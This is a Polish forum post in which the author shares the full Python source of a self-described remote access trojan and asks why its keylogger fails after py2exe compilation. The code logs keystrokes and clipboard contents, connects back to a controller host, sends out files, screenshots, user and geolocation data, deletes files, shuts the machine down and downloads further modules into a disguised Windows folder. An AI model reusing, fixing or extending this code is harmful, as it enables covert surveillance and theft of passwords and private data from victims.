Czesc interesuje sie bezpieczenstwem IT i napisalem takiego prostego RATa. Przechodze do sedna: gdy rat jest uruchomiany jako plik pythona to keylogger dziala, ale jak juz go skompiluje przez py2exe wtedy juz nie dziala, oto kod. Jakies rady? :
#!/usr/bin/python
from subprocess import call
from PIL import ImageGrab
import multiprocessing
import win32clipboard
from ctypes import *
import subprocess
import pythoncom
import platform
import requests
import getpass
import socket
import pyHook
import shutil
import time
import wget
import sys
import os
global command_execute_status
def run(x):
os.system(x)
def keylogger():
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None
def get_current_process():
# get a handle to the foreground window
hwnd = user32.GetForegroundWindow()
# find the process ID
pid = c_ulong(0)
user32.GetWindowThreadProcessId(hwnd, byref(pid))
# store the current process ID
process_id = "%d" % pid.value
# grab the executable
executable = create_string_buffer("\x00" * 512)
h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)
# now read it's title
window_title = create_string_buffer("\x00" * 512)
length = user32.GetWindowTextA(hwnd, byref(window_title),512)
# print out the header if we're in the right process
f = open(".logs", "ab")
f.write("\n[ PID: %s - %s - %s ]\n" % (process_id, executable.value, window_title.value))
f.close()
# close handles
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
def KeyStroke(event):
global current_window
# check to see if target changed windows
if event.WindowName != current_window:
current_window = event.WindowName
get_current_process()
# if they pressed a standard key
if event.Ascii > 32 and event.Ascii < 127:
f = open(".logs", "ab")
f.write(chr(event.Ascii))
f.close()
else:
# if [Ctrl-V], get the value on the clipboard
# added by Dan Frisch 2014
if event.Key == "V":
win32clipboard.OpenClipboard()
pasted_value = win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
f = open(".logs", "ab")
f.write("[PASTE] - %s" % (pasted_value))
f.close()
else:
f = open(".logs", "ab")
f.write("[%s]" % event.Key)
f.close()
# pass execution to next hook registered
return True
# create and register a hook manager
kl = pyHook.HookManager()
kl.KeyDown = KeyStroke
# register the hook and execute forever
kl.HookKeyboard()
pythoncom.PumpMessages()
def informations(client):
infos = requests.get('https://api.ipdata.co').json()
operating_system = platform.platform()
ip = infos["ip"]
isp = infos["organisation"]
country = infos["country_name"]
geo = str(infos["latitude"]) + ", " + str(infos["longitude"])
user = getpass.getuser()
arch = platform.architecture()[0]
info = open(".infos", "ab")
info.write("MACHINE INFORMATIONS\n")
#Zapis informacji o maszynie
info.write("OS: " + "\t\t" + operating_system + "\n")
info.write("ARCHITECTURE:" + "\t" + arch + "\n")
info.write("USER:" + "\t\t" + user + "\n")
info.write("IP:" + "\t\t" + ip + "\n")
info.write("ISP:" + "\t\t" + isp + "\n")
info.write("GEO: " + "\t\t" + geo + "\n")
info.write("COUNTRY:" + "\t" + country + "\n")
info.close()
informations = open(".infos", "r")
client.send(informations.read())
informations.close()
os.remove(".infos")
def main():
while 1:
try:
host = "192.168.1.11"
port = 30
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.send("[+] Py_trojan ready.")
while 1:
command = client.recv(1024)
command_execute(command, client)
except:
time.sleep(10)
continue
def command_execute(command, client):
if command == "ls":
try:
command_execute_status = subprocess.check_output("dir", shell = True)
client.send(command_execute_status)
except subprocess.CalledProcessError as error:
command_execute_status = "[-] " + str(error)
client.send(command_execute_status)
elif command[0:14] == "keylogger_dump":
try:
key_scan = open(".logs", "r")
client.send(key_scan.read())
except IOError as error:
client.send("[-]")
print(error)
elif command[0:4] == "info":
informations(client)
elif command[0:15] == "keylogger_start":
try:
t = multiprocessing.Process(target=keylogger, args=())
t.start()
clinet.send("[+]")
except:
client.send("[-]")
elif command[0:5] == "mkdir":
try:
os.mkdir(command[6:])
command_execute_status = "[+]"
client.send(command_execute_status)
except OSError as error:
command_execute_status = "[-] " + str(error)
client.send(command_execute_status)
elif command[0:3] == "run":
prg = command[4:]
if os.path.isfile(prg) == True:
y = multiprocessing.Process(target=run, args=(prg,))
y.start()
client.send("[+]")
else:
client.send("[-] No such file: " + prg)
elif command[0:2] == "cd":
try:
os.chdir(command[3:])
command_execute_status = "[+]"
client.send(command_execute_status)
except OSError as error:
command_execute_status = "[-] " + str(error)
client.send(command_execute_status)
elif command[0:15] == "download_module":
os.chdir("C:\\WINDOWS\\PRoc_Sys_CoNFIG\\New_Core_System")
wget.download("http://192.168.1.11/" + command[16:])
client.send("[+]")
elif command[0:5] == "rmdir":
try:
os.rmdir(command[6:])
command_execute_status = "[+]"
client.send(command_execute_status)
except OSError as error:
command_execute_status = "[-] " + str(error)
client.send(command_execute_status)
elif command[0:2] == "rm":
try:
os.remove(command[3:])
command_execute_status = "[+]"
client.send(command_execute_status)
except OSError as error:
command_execute_status = "[-] " + str(error)
client.send(command_execute_status)
elif command[0:3] == "pwd":
client.send(os.getcwd())
elif command[0:3] == "cat":
try:
if ".pdf" in command[4:]:
os.system("C:\\WINDOWS\\PRoc_Sys_CoNFIG\\system_files_config\\pdf2txt.py -o conwert_pdf.txt " + command[4:])
f = open("conwert_pdf.txt", "r")
client.send(f.read())
f.close()
os.remove("conwert_pdf.txt")
else:
file = open(command[4:], "r")
file_content = file.read()
command_execute_status = file_content
client.send(command_execute_status)
file.close()
except IOError as error:
command_execute_status = "[-] " + str(error)
client.send(command_execute_status)
elif command[0:8] == "ifconfig":
command_execute_status = subprocess.check_output("ipconfig", shell = True)
client.send(command_execute_status)
elif command[0:8] == "shutdown":
try:
os.system("shutdown /s")
command_execute_status = "[+]"
client.send(command_execute_status)
except OSError as error:
command_execute_status = "[-] " + str(error)
client.send(command_execute_status)
elif command[0:6] == "whoami":
command_execute_status = getpass.getuser()
client.send(command_execute_status)
elif command[0:2] == "cp":
try:
client.send("[*] Copy protocol open")
src = client.recv(1024)
client.send("[*] src download")
dst = client.recv(1024)
shutil.copy(src,dst)
command_execute_status = "[+]"
except:
command_execute_status = "[-]"
elif command[0:10] == "screenshot":
snapshot = ImageGrab.grab()
save_path = "C:\\WINDOWS\\PRoc_Sys_CoNFIG\\Sc_core\\screen.jpeg"
snapshot.save(save_path)
f = open("C:\\WINDOWS\\PRoc_Sys_CoNFIG\\Sc_core\\screen.jpeg", "r")
client.send(f.read())
elif command == "OFF":
client.close()
sys.exit()
else:
command_execute_status = "[-] Command not found"
client.send(command_execute_status)
if __name__ == "__main__":
main()